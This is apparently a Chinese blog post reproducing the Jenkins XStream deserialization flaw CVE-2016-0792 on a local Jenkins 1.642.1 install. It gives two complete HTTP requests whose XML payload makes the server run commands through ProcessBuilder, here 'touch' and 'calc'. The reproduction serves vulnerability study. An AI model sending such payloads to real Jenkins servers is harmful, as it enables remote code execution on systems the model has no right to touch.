Jenkins-CVE-2016-0792漏洞复现（Xstream 反序列化漏洞）

环境搭建

首先需要安装jenkins，这里使用的是1.642.1版本，其他版本可以自行下载，在官网和百度一开始都是没找到的，包括看了其他人的分析，但是都没有找到环境搭建，大部分是直接复现和poc分析
下载链接

http://archives.jenkins-ci.org/war-stable/1.642.1/jenkins.war

这里需要在本地配置java环境，具体方法这里不在介绍，我复现使用的是java8

java -jar jenkins.war --httpPort=8080

httpport可以自定义
之后访问

http://127.0.0.1:8080/

可以打开即为搭建成功

漏洞复现

使用burp发送数据包

POST /createItem?name=foo HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.135:8080/newJob
Cookie: JSESSIONID.51669330=2ma9elc96wwk16e4k07sq0ri9; screenResolution=1440x900
Connection: keep-alive
Content-Type: text/xml
Content-Length: 889

<map>
  <entry>
    <groovy.util.Expando>
      <expandoProperties>
        <entry>
          <string>hashCode</string>
          <org.codehaus.groovy.runtime.MethodClosure>
            <delegate class="java.lang.ProcessBuilder">
              <command>
                <string>touch</string>
        <string>/home/angelwhu/tmp/pwned</string>
              </command>
              <redirectErrorStream>false</redirectErrorStream>
            </delegate>
            <owner class="java.lang.ProcessBuilder" reference="../delegate"/>
            <resolveStrategy>0</resolveStrategy>
            <directive>0</directive>
            <parameterTypes/>
            <maximumNumberOfParameters>0</maximumNumberOfParameters>
            <method>start</method>
          </org.codehaus.groovy.runtime.MethodClosure>
        </entry>
      </expandoProperties>
    </groovy.util.Expando>
    <int>123</int>
  </entry>
</map>

因为这里是使用本地的windows，所以修改一下command中间的参数

POST /createItem?name=foo HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.135:8080/newJob
Cookie: JSESSIONID.51669330=2ma9elc96wwk16e4k07sq0ri9; screenResolution=1440x900
Connection: keep-alive
Content-Type: text/xml
Content-Length: 889

<map>
  <entry>
    <groovy.util.Expando>
      <expandoProperties>
        <entry>
          <string>hashCode</string>
          <org.codehaus.groovy.runtime.MethodClosure>
            <delegate class="java.lang.ProcessBuilder">
              <command>
                <string>calc</string>
              </command>
              <redirectErrorStream>false</redirectErrorStream>
            </delegate>
            <owner class="java.lang.ProcessBuilder" reference="../delegate"/>
            <resolveStrategy>0</resolveStrategy>
            <directive>0</directive>
            <parameterTypes/>
            <maximumNumberOfParameters>0</maximumNumberOfParameters>
            <method>start</method>
          </org.codehaus.groovy.runtime.MethodClosure>
        </entry>
      </expandoProperties>
    </groovy.util.Expando>
    <int>123</int>
  </entry>
</map>

成功弹出计算器

环境清理

使用命令java -jar jenkins.war --httpPort=8080后会自动在用户目录下创建一个.jenkins文件夹，大约占用c盘100m左右的空间，在使用完后可以对其进行删除
之后清理回收站，游戏GAI束。

参考文章

https://www.angelwhu.com/paper/2016/03/15/xstream-deserialization-component-attack-analysis/#0x04-Jenkins利用
https://www.jenkins.io/zh/doc/pipeline/tour/getting-started/